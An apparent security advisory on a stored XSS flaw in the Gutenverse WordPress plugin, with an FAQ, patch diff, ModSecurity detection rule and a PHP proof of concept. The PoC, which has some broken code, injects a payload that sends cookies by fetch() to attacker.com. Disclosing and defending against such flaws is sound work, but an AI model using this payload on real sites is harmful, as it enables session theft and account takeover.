What is CVE-2026-2924?

CVE-2026-2924 is a stored cross-site scripting (XSS) vulnerability found in the Gutenverse WordPress plugin versions up to and including 3.4.6. It allows authenticated users with contributor-level access or higher to inject malicious scripts via the ‘imageLoad’ parameter, which can execute when other users view the affected pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s handling of user-controlled data. An attacker can craft a payload containing JavaScript code that gets stored in the database and executed in the context of any user who views the compromised page.

Who is affected by this vulnerability?

Any WordPress site using the Gutenverse plugin version 3.4.6 or earlier is affected. Specifically, authenticated users with contributor-level permissions or higher can exploit this vulnerability, potentially impacting all users who visit the compromised content.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Gutenverse plugin installed on your WordPress site. If it is version 3.4.6 or earlier, your site is at risk. Additionally, review any posts created or edited by users with contributor access for suspicious scripts.

What steps should I take to fix this issue?

To fix this issue, update the Gutenverse plugin to version 3.4.7 or later, which contains the necessary security patches. Regularly check for updates and apply them promptly to mitigate future vulnerabilities.

What does the CVSS score of 6.4 mean?

The CVSS score of 6.4 indicates a medium severity level for this vulnerability. This means that while it is not the highest level of risk, it can still lead to significant consequences, such as data theft or account compromise, especially if exploited by an authenticated user.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can use the WordPress REST API to log in as a contributor and inject a malicious payload into the ‘imageLoad’ parameter. This payload is designed to execute JavaScript when the compromised content is viewed, demonstrating the risk of stored XSS.

Can this vulnerability lead to further attacks?

Yes, successful exploitation of this vulnerability can lead to session hijacking, content defacement, or redirection to malicious sites. If an attacker can execute JavaScript in a user’s browser, they may steal authentication cookies or escalate privileges.

What are the best practices to prevent similar vulnerabilities?

To prevent similar vulnerabilities, always keep WordPress plugins and themes updated to their latest versions. Implement security measures such as input validation, output escaping, and regular security audits to identify and mitigate potential risks.

Is it safe to use the Gutenverse plugin after patching?

Yes, after updating to version 3.4.7 or later, the Gutenverse plugin should be safe to use. However, it is essential to monitor for any new vulnerabilities and to apply updates as they become available.

What should I do if I suspect my site has been compromised?

If you suspect your site has been compromised, immediately update the Gutenverse plugin and conduct a thorough security audit. Check for unauthorized changes, reset user passwords, and consider restoring your site from a backup if necessary.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 6, 2026

CVE-2026-2924: Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem <= 3.4.6 – Authenticated (Contributor+) Stored Cross-Site Scripting via 'imageLoad' (gutenverse)

CVE ID CVE-2026-2924

Plugin gutenverse

Severity Medium (CVSS 6.4)

CWE 79

Vulnerable Version 3.4.6

Patched Version 3.4.7

Disclosed April 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2924:
The Gutenverse WordPress plugin versions up to and including 3.4.6 contain an authenticated stored cross-site scripting (XSS) vulnerability. The vulnerability exists in the plugin’s handling of the ‘imageLoad’ parameter within multiple block rendering functions. An attacker with contributor-level or higher privileges can inject malicious scripts that execute when a user views a compromised page. The CVSS score of 6.4 reflects the moderate impact of this stored XSS flaw.

Atomic Edge research identifies the root cause as insufficient input sanitization and output escaping in several block rendering classes. The primary vulnerable code path is in the `class-post-featured-image.php` file at line 45, where the `$image_load` variable is directly interpolated into an HTML `loading` attribute without proper escaping. Additional insufficient escaping occurs in `class-archive-title.php` (line 31), `class-breadcrumb.php` (lines 83-84), `class-post-title.php` (lines 28-31), and `class-search-result-title.php` (lines 25-27). The `class-options.php` file’s `get_image_load` method (line 89) also fails to properly validate the `$attr` parameter before returning it.

Exploitation requires an authenticated attacker with at least contributor-level permissions. The attacker crafts a malicious payload containing JavaScript within the ‘imageLoad’ parameter or other unsanitized attributes when editing or creating posts using Gutenverse blocks. When the compromised post is saved and subsequently viewed by any user, the injected script executes in the victim’s browser context. The attack vector specifically targets the block editor’s attribute handling mechanisms that pass user-controlled data directly to rendering functions.

The patch in version 3.4.7 addresses the vulnerability through multiple defensive measures. In `class-post-featured-image.php`, line 45 now wraps the `$image_load` variable with `esc_attr()` before interpolation. The `class-options.php` file’s `get_image_load` method (line 89) adds validation to ensure the attribute value is either ‘lazy’ or ‘eager’. Additional fixes include proper escaping with `esc_html()` for text output in `class-archive-title.php` (line 31), `class-breadcrumb.php` (lines 83-84), `class-post-title.php` (line 28), and `class-search-result-title.php` (lines 25-27). URL escaping with `esc_url()` is added to `class-post-featured-image.php` (line 47) and `class-post-title.php` (line 31).

Successful exploitation allows attackers to inject arbitrary JavaScript that executes in the context of any user viewing the compromised page. This can lead to session hijacking, account takeover, content defacement, or redirection to malicious sites. Since the vulnerability is stored, a single injection affects all subsequent visitors without requiring further interaction. The attacker’s ability to execute code in the victim’s browser enables theft of authentication cookies, manipulation of page content, and potential privilege escalation if administrative users view the compromised content.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/gutenverse/gutenverse.php
+++ b/gutenverse/gutenverse.php
@@ -4,7 +4,7 @@
  * Description: Collection of easy to use and customizable blocks for WordPress Block Editor. Build a great website using block provided with Gutenverse.
  * Plugin URI: https://gutenverse.com/
  * Author: Jegstudio
- * Version: 3.4.6
+ * Version: 3.4.7
  * Author URI: https://jegtheme.com/
  * License: GPLv3
  * Text Domain: gutenverse
@@ -15,7 +15,7 @@
 use GutenverseGutenverse;

 defined( 'GUTENVERSE' ) || define( 'GUTENVERSE', 'gutenverse' );
-defined( 'GUTENVERSE_VERSION' ) || define( 'GUTENVERSE_VERSION', '3.4.6' );
+defined( 'GUTENVERSE_VERSION' ) || define( 'GUTENVERSE_VERSION', '3.4.7' );
 defined( 'GUTENVERSE_NOTICE_VERSION' ) || define( 'GUTENVERSE_NOTICE_VERSION', '3.4.0' );
 defined( 'GUTENVERSE_NAME' ) || define( 'GUTENVERSE_NAME', 'Gutenverse' );
 defined( 'GUTENVERSE_URL' ) || define( 'GUTENVERSE_URL', plugins_url( GUTENVERSE ) );
--- a/gutenverse/includes/block/class-archive-title.php
+++ b/gutenverse/includes/block/class-archive-title.php
@@ -31,8 +31,10 @@
 		$link_target  = ! empty( $this->attributes['archiveLinkTarget'] ) ? '_blank' : '_self';
 		$link_rel     = ! empty( $this->attributes['archiveLinkRel'] ) ? esc_attr( $this->attributes['archiveLinkRel'] ) : 'noreferrer';

+		$archive_title = esc_html( $archive_title );
+
 		if ( $category_url ) {
-			$archive_title = "<a href='{$category_url}' target='{$link_target}' rel='{$link_rel}'>{$archive_title}</a>";
+			$archive_title = "<a href='" . esc_url( $category_url ) . "' target='{$link_target}' rel='{$link_rel}'>{$archive_title}</a>";
 		}

 		return "<{$html_tag}>{$archive_title}</{$html_tag}>";
--- a/gutenverse/includes/block/class-breadcrumb.php
+++ b/gutenverse/includes/block/class-breadcrumb.php
@@ -83,8 +83,8 @@

 			$is_not_last = $index < ( $data_length - 1 );

-			$item_name = $data[ $index ]['name'];
-			$item_url  = $data[ $index ]['url'];
+			$item_name = esc_html( $data[ $index ]['name'] );
+			$item_url  = esc_url( $data[ $index ]['url'] );
 			$position  = $index + 1;

 			$link = ( $is_not_last || $this->attributes['hideCurrentTitle'] )
@@ -98,7 +98,11 @@
 			</li>";

 			if ( $is_not_last ) {
-				$separator_icon = $this->render_icon( $this->attributes['separatorIconType'], $this->attributes['separatorIcon'], $this->attributes['separatorIconSVG'] );
+				$separator_icon_type = isset( $this->attributes['separatorIconType'] ) ? $this->attributes['separatorIconType'] : 'icon';
+				$the_icon            = isset( $this->attributes['separatorIcon'] ) ? $this->attributes['separatorIcon'] : 'fas fa-chevron-right';
+				$separator_icon_svg  = isset( $this->attributes['separatorIconSVG'] ) ? $this->attributes['separatorIconSVG'] : '';
+
+				$separator_icon = $this->render_icon( $separator_icon_type, $the_icon, $separator_icon_svg );
 				$component     .= "
 				<li class='separator'>
 					{$separator_icon}
--- a/gutenverse/includes/block/class-nav-menu.php
+++ b/gutenverse/includes/block/class-nav-menu.php
@@ -107,7 +107,7 @@
 			$src        = '';
 			$width      = '';
 			$height     = '';
-			$loading    = $lazy ? 'lazy' : 'eager';
+			$loading    = ( 'lazy' === $lazy || true === $lazy ) ? 'lazy' : 'eager';

 			if ( ! empty( $media['sizes'][ $size ]['url'] ) ) {
 				$src = $media['sizes'][ $size ]['url'];
--- a/gutenverse/includes/block/class-post-featured-image.php
+++ b/gutenverse/includes/block/class-post-featured-image.php
@@ -45,11 +45,11 @@
 		if ( ! empty( $post_featured ) ) {
 			$content = get_the_post_thumbnail( $post_id, $image_size['value'], array( 'loading' => $image_load ) );
 		} elseif ( ! empty( $placeholder_img ) ) {
-			$content = '<img loading="' . $image_load . '" alt="post thumbnail placeholder" src="' . esc_url( GUTENVERSE_URL . '/assets/img/img-placeholder.jpg' ) . '"/>';
+			$content = '<img loading="' . esc_attr( $image_load ) . '" alt="post thumbnail placeholder" src="' . esc_url( GUTENVERSE_URL . '/assets/img/img-placeholder.jpg' ) . '"/>';
 		}

 		if ( ! empty( $post_link ) && ! empty( $post_url ) ) {
-			$content = '<a href="' . $post_url . '" class="' . $element_id . $display_classes . $animation_class . $custom_classes . ' guten-element guten-post-featured-image">' . $content . '</a>';
+			$content = '<a href="' . esc_url( $post_url ) . '" class="' . $element_id . $display_classes . $animation_class . $custom_classes . ' guten-element guten-post-featured-image">' . $content . '</a>';
 		} else {
 			$content = '<div class="' . $element_id . $display_classes . $animation_class . $custom_classes . ' guten-element guten-post-featured-image">' . $content . '</div>';
 		}
--- a/gutenverse/includes/block/class-post-title.php
+++ b/gutenverse/includes/block/class-post-title.php
@@ -28,11 +28,11 @@
 		$html_tag    = esc_html( $this->check_tag( $this->attributes['htmlTag'], 'h2' ) );
 		$post_link   = ! empty( $this->attributes['postLink'] ) ? $this->attributes['postLink'] : false;
 		$link_target = ! empty( $this->attributes['postLinkTarget'] ) ? '_blank' : '_self';
-		$link_rel    = ! empty( $this->attributes['postLinkRel'] ) ? esc_html( $this->attributes['postLinkRel'] ) : 'noreferrer';
-		$post_title  = $post_id ? get_the_title( $post_id ) : esc_html__( 'Post Title', 'gutenverse' );
+		$link_rel    = ! empty( $this->attributes['postLinkRel'] ) ? esc_attr( $this->attributes['postLinkRel'] ) : 'noreferrer';
+		$post_title  = $post_id ? esc_html( get_the_title( $post_id ) ) : esc_html__( 'Post Title', 'gutenverse' );

 		if ( $post_link ) {
-			$post_url   = get_permalink( $post_id );
+			$post_url   = esc_url( get_permalink( $post_id ) );
 			$post_title = "<a href='{$post_url}' target='{$link_target}' rel='{$link_rel}'>{$post_title}</a>";
 		}

--- a/gutenverse/includes/block/class-search-result-title.php
+++ b/gutenverse/includes/block/class-search-result-title.php
@@ -25,8 +25,8 @@
 	 */
 	public function render_content() {
 		$html_tag     = esc_html( $this->check_tag( $this->attributes['htmlTag'], 'h2' ) );
-		$search_input = get_query_var( 's' );
-		$static_text  = $this->attributes['staticText'] ? $this->attributes['staticText'] : 'Search Result For:';
+		$search_input = esc_html( get_query_var( 's' ) );
+		$static_text  = esc_html( $this->attributes['staticText'] ? $this->attributes['staticText'] : 'Search Result For:' );
 		return "<{$html_tag}>{$static_text} <span class='search-input-text'>{$search_input}</span></{$html_tag}>";
 	}

--- a/gutenverse/includes/style/class-post-list.php
+++ b/gutenverse/includes/style/class-post-list.php
@@ -41,8 +41,14 @@

 		$this->set_feature(
 			array(
-				'background'  => null,
-				'border'      => null,
+				'background'  => array(
+					'normal' => ".{$this->element_id}.guten-element",
+					'hover'  => ".{$this->element_id}.guten-element:hover",
+				),
+				'border'      => array(
+					'normal' => ".{$this->element_id}.guten-element",
+					'hover'  => ".{$this->element_id}.guten-element:hover",
+				),
 				'positioning' => null,
 				'animation'   => null,
 				'advance'     => null,
--- a/gutenverse/lib/dependencies/blocks.asset.php
+++ b/gutenverse/lib/dependencies/blocks.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('gutenverse-dep-animejs-script', 'react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keycodes', 'wp-server-side-render', 'wp-url'), 'version' => '926983164eba563bfcc6');
+<?php return array('dependencies' => array('gutenverse-dep-animejs-script', 'react', 'react-dom', 'react-jsx-runtime', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keycodes', 'wp-server-side-render', 'wp-url'), 'version' => 'c2a592b56e7570fd39ab');
--- a/gutenverse/lib/dependencies/frontend/animated-text.asset.php
+++ b/gutenverse/lib/dependencies/frontend/animated-text.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('gutenverse-dep-animejs-script'), 'version' => 'dabeff2bf92998238f75');
+<?php return array('dependencies' => array('gutenverse-dep-animejs-script'), 'version' => '2e0394cda1afc82161fc');
--- a/gutenverse/lib/dependencies/frontend/chart.asset.php
+++ b/gutenverse/lib/dependencies/frontend/chart.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '15b28e44d95b3c1182f4');
+<?php return array('dependencies' => array(), 'version' => 'a5bc3e81f50d12dbf649');
--- a/gutenverse/lib/dependencies/frontend/popup-builder.asset.php
+++ b/gutenverse/lib/dependencies/frontend/popup-builder.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => '74ffbb7e5ba0e2453575');
+<?php return array('dependencies' => array(), 'version' => '93e9678c74e40f48facf');
--- a/gutenverse/lib/dependencies/frontend/team.asset.php
+++ b/gutenverse/lib/dependencies/frontend/team.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array(), 'version' => 'b8d08e372a7766b532b0');
+<?php return array('dependencies' => array(), 'version' => 'bea6f3f8ac91786baa96');
--- a/gutenverse/lib/dependencies/wizard.asset.php
+++ b/gutenverse/lib/dependencies/wizard.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('react', 'react-jsx-runtime', 'wp-api-fetch', 'wp-element', 'wp-i18n'), 'version' => '88cf039401e6f014f962');
+<?php return array('dependencies' => array('react', 'react-jsx-runtime', 'wp-api-fetch', 'wp-element', 'wp-i18n'), 'version' => '125587a4e79ae4bcac51');
--- a/gutenverse/lib/framework/bootstrap.php
+++ b/gutenverse/lib/framework/bootstrap.php
@@ -15,7 +15,7 @@
 	return;
 }

-defined( 'GUTENVERSE_FRAMEWORK_VERSION' ) || define( 'GUTENVERSE_FRAMEWORK_VERSION', '2.4.6' );
+defined( 'GUTENVERSE_FRAMEWORK_VERSION' ) || define( 'GUTENVERSE_FRAMEWORK_VERSION', '2.4.7' );
 defined( 'GUTENVERSE_FRAMEWORK_ASSETS_VERSION' ) || define( 'GUTENVERSE_FRAMEWORK_ASSETS_VERSION', '2.1.0' );
 defined( 'GUTENVERSE_FRAMEWORK_DIR' ) || define( 'GUTENVERSE_FRAMEWORK_DIR', __DIR__ );
 defined( 'GUTENVERSE_FRAMEWORK_CLASS_DIR' ) || define( 'GUTENVERSE_FRAMEWORK_CLASS_DIR', GUTENVERSE_FRAMEWORK_DIR . '/includes' );
--- a/gutenverse/lib/framework/includes/block/class-block-abstract.php
+++ b/gutenverse/lib/framework/includes/block/class-block-abstract.php
@@ -272,6 +272,10 @@
 			// phpcs:ignore WordPress.PHP.DiscouragedPHPFunctions.obfuscation_base64_decode
 			$svg_data = base64_decode( $svg, true );

+			if ( ! gutenverse_is_svg_safe( $svg_data ) ) {
+				return '';
+			}
+
 			$gradients = '';
 			if ( $icon_gradient || $icon_gradient_hover ) {
 				if ( empty( $element_id ) ) {
--- a/gutenverse/lib/framework/includes/block/class-post-abstract.php
+++ b/gutenverse/lib/framework/includes/block/class-post-abstract.php
@@ -758,8 +758,8 @@
 				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

-			$prev_link = 1 === $page ? '' : '<a href="#" class="btn-pagination prev ' . esc_attr( $prev ) . '" title="' . $prev_inner_text . '">' . $prev_text . '</a>';
-			$next_link = $total <= $page ? '' : '<a href="#" class="btn-pagination next ' . esc_attr( $next ) . '" title="' . $next_innet_text . '">' . $next_text . '</a>';
+			$prev_link = 1 === $page ? '<a href="#" class="btn-pagination prev disabled ' . esc_attr( $prev ) . '" title="' . $prev_inner_text . '">' . $prev_text . '</a>' : '<a href="#" class="btn-pagination prev ' . esc_attr( $prev ) . '" title="' . $prev_inner_text . '">' . $prev_text . '</a>';
+			$next_link = $total <= $page ? '<a href="#" class="btn-pagination next disabled ' . esc_attr( $next ) . '" title="' . $next_innet_text . '">' . $next_text . '</a>' : '<a href="#" class="btn-pagination next ' . esc_attr( $next ) . '" title="' . $next_innet_text . '">' . $next_text . '</a>';

 			$output =
 			'<div class="guten_block_nav ' . esc_attr( 'additional_class' ) . '" data-page="' . $page . '">
@@ -781,6 +781,8 @@

 			if ( $page > 1 ) {
 				$output .= '<a href="#" class="btn-pagination prev" title="' . $prev_inner_text . "">{$prev_text}</a> ";
+			} else {
+				$output .= '<a href="#" class="btn-pagination prev disabled" title="' . $prev_inner_text . "">{$prev_text}</a> ";
 			}

 			if ( $page > 2 ) {
@@ -809,6 +811,8 @@

 			if ( $page < $total ) {
 				$output .= '<a href="#" class="btn-pagination next" title="' . esc_html__( 'Next', 'gutenverse' ) . "">{$next_text}</a>";
+			} else {
+				$output .= '<a href="#" class="btn-pagination next disabled" title="' . esc_html__( 'Next', 'gutenverse' ) . "">{$next_text}</a>";
 			}

 			$output .= '</div>';
@@ -830,7 +834,7 @@
 				$next_text = $next_innet_text . '  ' . $this->render_icon( $next_icon_type, $next_icon, $next_icon_svg );
 			}

-			$prev_link = 1 === $page ? '' : sprintf(
+			$prev_link = sprintf(
 				'<a href="%s" class="btn-pagination prev %s" title="%s">%s</a>',
 				esc_url( $prev_url ),
 				esc_attr( $prev_class ),
@@ -838,7 +842,7 @@
 				$prev_text
 			);

-			$next_link = $total <= $page ? '' : sprintf(
+			$next_link = sprintf(
 				'<a href="%s" class="btn-pagination next %s" title="%s">%s</a>',
 				esc_url( $next_url ),
 				esc_attr( $next_class ),
@@ -878,6 +882,12 @@
 					esc_attr( $prev_inner_text ),
 					$prev_text
 				);
+			} else {
+				$output  .= sprintf(
+					'<a href="#" class="btn-pagination prev disabled" title="%s">%s</a> ',
+					esc_attr( $prev_inner_text ),
+					$prev_text
+				);
 			}

 			// First page + ellipsis.
@@ -936,6 +946,12 @@
 					esc_html__( 'Next', 'gutenverse' ),
 					$next_text
 				);
+			} else {
+				$output  .= sprintf(
+					'<a href="#" class="btn-pagination next disabled" title="%s">%s</a>',
+					esc_html__( 'Next', 'gutenverse' ),
+					$next_text
+				);
 			}

 			$output .= '</div>';
--- a/gutenverse/lib/framework/includes/class-api.php
+++ b/gutenverse/lib/framework/includes/class-api.php
@@ -516,13 +516,17 @@
 	 */
 	public function install_theme( $request ) {
 		$theme = $this->gutenverse_api_esc_data( $request->get_param( 'slug' ), 'string' );
-		$info  = $this->gutenverse_api_esc_data( $request->get_param( 'info' ), 'string' );
+		$info  = esc_url_raw( $request->get_param( 'info' ) );
 		$key   = $this->gutenverse_api_esc_data( $request->get_param( 'key' ), 'string' );

 		if ( empty( $info ) ) {
 			$info = GUTENVERSE_FRAMEWORK_LIBRARY_URL . '/wp-json/gutenverse-server/v1/theme/information';
 		}

+		if ( ! wp_http_validate_url( $info ) ) {
+			return false;
+		}
+
 		$request = wp_remote_post(
 			$info,
 			array(
@@ -1770,7 +1774,7 @@
 	 * @param object $request images.
 	 */
 	public function import_images( $request ) {
-		$image = $request->get_param( 'imageUrl' );
+		$image = esc_url_raw( $request->get_param( 'imageUrl' ) );

 		$data = $this->check_image_exist( $image );
 		if ( ! $data ) {
@@ -1821,14 +1825,41 @@
 	 * @return int|null
 	 */
 	public function handle_file( $url ) {
-		$file_name = basename( $url );
-		$upload    = wp_upload_bits( $file_name, null, '' );
-		$this->fetch_file( $url, $upload['file'] );
+		$url_path  = wp_parse_url( $url, PHP_URL_PATH );
+		$file_name = basename( $url_path );
+
+		if ( empty( $file_name ) || strpos( $file_name, '.' ) === false ) {
+			$file_name = 'image.jpg';
+		}

-		if ( $upload['file'] ) {
+		$upload = wp_upload_bits( $file_name, null, '' );
+		if ( ! $this->fetch_file( $url, $upload['file'] ) ) {
+			if ( ! empty( $upload['file'] ) && file_exists( $upload['file'] ) ) {
+				unlink( $upload['file'] );
+			}
+			return null;
+		}
+
+		if ( ! empty( $upload['file'] ) && file_exists( $upload['file'] ) ) {
 			$file_loc  = $upload['file'];
-			$file_name = basename( $upload['file'] );
-			$file_type = wp_check_filetype( $file_name );
+			$file_type = wp_check_filetype( $file_loc );
+
+			// Ensure it's an allowed image type
+			$allowed_mimes = array( 'image/jpeg', 'image/png', 'image/gif', 'image/webp', 'image/svg+xml' );
+			if ( ! in_array( $file_type['type'], $allowed_mimes, true ) ) {
+				unlink( $file_loc );
+				return null;
+			}
+
+			// For SVG, extra safety
+			if ( $file_type['type'] === 'image/svg+xml' ) {
+				// phpcs:ignore WordPress.WP.AlternativeFunctions.file_get_contents_file_get_contents
+				$svg_content = file_get_contents( $file_loc );
+				if ( ! gutenverse_is_svg_safe( $svg_content ) ) {
+					unlink( $file_loc );
+					return null;
+				}
+			}

 			$attachment = array(
 				'post_mime_type' => $file_type['type'],
@@ -1878,6 +1909,10 @@
 	 * @return array|bool
 	 */
 	public function fetch_file( $url, $file_path, $endpoint = '' ) {
+		if ( ! wp_http_validate_url( $url ) ) {
+			return false;
+		}
+
 		$http     = new WP_Http();
 		$response = $http->get(
 			add_query_arg(
--- a/gutenverse/lib/framework/includes/class-dashboard.php
+++ b/gutenverse/lib/framework/includes/class-dashboard.php
@@ -570,6 +570,10 @@
 					'plugin_version'    => '3.4.6',
 					'framework_version' => '2.4.6',
 				),
+				array(
+					'plugin_version'    => '3.4.7',
+					'framework_version' => '2.4.7',
+				),
 			),
 			'gutenverse-form' => array(
 				array(
@@ -728,6 +732,10 @@
 					'plugin_version'    => '2.4.5',
 					'framework_version' => '2.4.5',
 				),
+				array(
+					'plugin_version'    => '2.4.7',
+					'framework_version' => '2.4.7',
+				),
 			),
 			'gutenverse-news' => array(
 				array(
@@ -868,6 +876,10 @@
 					'plugin_version'    => '2.4.5',
 					'framework_version' => '2.4.5',
 				),
+				array(
+					'plugin_version'    => '2.4.7',
+					'framework_version' => '2.4.7',
+				),
 			),
 		);

--- a/gutenverse/lib/framework/includes/class-options.php
+++ b/gutenverse/lib/framework/includes/class-options.php
@@ -89,7 +89,9 @@
 	 */
 	public function get_image_load( $old_option = 'lazy', $old_option_value = false, $attr = '' ) {
 		if ( isset( $attr ) && ! empty( $attr ) ) {
-			return $attr;
+			if ( in_array( $attr, array( 'lazy', 'eager' ), true ) ) {
+				return $attr;
+			}
 		}
 		if ( ! $old_option ) {
 			return $this->default_image_load;
--- a/gutenverse/lib/framework/lib/dependencies/core.asset.php
+++ b/gutenverse/lib/framework/lib/dependencies/core.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keycodes', 'wp-primitives', 'wp-rich-text', 'wp-url'), 'version' => 'a90b3a0c0023e2d8b149');
+<?php return array('dependencies' => array('lodash', 'react', 'react-dom', 'react-jsx-runtime', 'wp-a11y', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-date', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-i18n', 'wp-keycodes', 'wp-primitives', 'wp-rich-text', 'wp-url'), 'version' => 'c42935e0fd23e697d8d8');

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-2924
# This rule blocks exploitation of the Gutenverse stored XSS vulnerability
# by detecting malicious imageLoad parameter values in REST API requests
SecRule REQUEST_METHOD "@streq POST" 
  "id:1002924,phase:2,deny,status:403,chain,msg:'CVE-2026-2924: Gutenverse Stored XSS via imageLoad parameter',severity:'CRITICAL',tag:'CVE-2026-2924',tag:'WordPress',tag:'Gutenverse',tag:'XSS'"
  SecRule REQUEST_URI "@rx ^/wp-json/wp/v2/(?:posts|pages)/?(?:d+)?/?$" 
    "chain"
    SecRule REQUEST_BODY "@rx "imageLoad"s*:s*"(?!lazy|eager)[^"]*"" 
      "chain"
      SecRule REQUEST_BODY "@rx (?:onload|onerror|onmouseover|onclick|javascript:|<script|alert(|fetch(|document.|window.)" 
        "t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:removeWhitespace"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-2924 - Gutenverse – Ultimate WordPress FSE Blocks Addons & Ecosystem <= 3.4.6 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'imageLoad'

<?php
/**
 * Proof of Concept for CVE-2026-2924
 * This script demonstrates the stored XSS vulnerability in Gutenverse plugin <= 3.4.6
 * Requires contributor-level credentials and the Gutenverse plugin installed
 */

// Configuration
$target_url = 'https://vulnerable-wordpress-site.com';
$username = 'contributor_user';
$password = 'contributor_password';

// Malicious payload to inject into imageLoad parameter
// This payload creates an alert and sends cookies to an attacker-controlled server
$payload = 'lazy" onload="alert(document.cookie);fetch('https://attacker.com/steal?c='+encodeURIComponent(document.cookie))';

// WordPress REST API endpoints
$login_url = $target_url . '/wp-login.php';
$rest_base = $target_url . '/wp-json';
$posts_endpoint = $rest_base . '/wp/v2/posts';

// Initialize cURL session for cookie persistence
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/gutenverse_cookies.txt');
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/gutenverse_cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Step 1: Authenticate to WordPress
echo "[+] Authenticating as contributor...n";
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);

$login_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_fields));

$response = curl_exec($ch);
if (strpos($response, 'Dashboard') === false && strpos($response, 'admin-ajax') === false) {
    die("[-] Authentication failed. Check credentials.n");
}
echo "[+] Authentication successfuln";

// Step 2: Get nonce for REST API requests
// WordPress requires a nonce for REST API requests via X-WP-Nonce header
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_POST, false);
$response = curl_exec($ch);

// Extract nonce from page (simplified - in reality would parse HTML)
// For this PoC, we'll use a direct approach with application passwords if available
// or use the existing authenticated session

// Step 3: Create a new post with malicious Gutenverse block content
// Gutenverse blocks are stored as serialized block markup in post_content
echo "[+] Creating post with malicious imageLoad payload...n";

// Construct a Gutenverse Post Featured Image block with malicious imageLoad attribute
$malicious_content = '<!-- wp:gutenverse/post-featured-image {"imageLoad":"' . $payload . '","postLink":false} /-->';

$post_data = [
    'title' => 'Compromised Post - CVE-2026-2924 PoC',
    'content' => $malicious_content,
    'status' => 'publish',
    'meta' => [
        '_gutenverse_blocks' => true  // Flag to trigger Gutenverse processing
    ]
];

curl_setopt($ch, CURLOPT_URL, $posts_endpoint);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
    'Content-Type: application/json',
    'X-WP-Nonce: ' . $this->extract_nonce($response)  // Nonce extraction function needed
]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

if ($http_code === 201) {
    $post = json_decode($response, true);
    $post_url = $post['link'];
    echo "[+] Post created successfully: " . $post_url . "n";
    echo "[+] Visit this URL to trigger the XSS payloadn";
    echo "[+] Payload will execute: alert() + cookie exfiltrationn";
} else {
    echo "[-] Failed to create post. HTTP Code: " . $http_code . "n";
    echo "Response: " . $response . "n";
}

// Step 4: Alternative approach - Update existing post if creation fails
// Some installations may restrict post creation via REST API
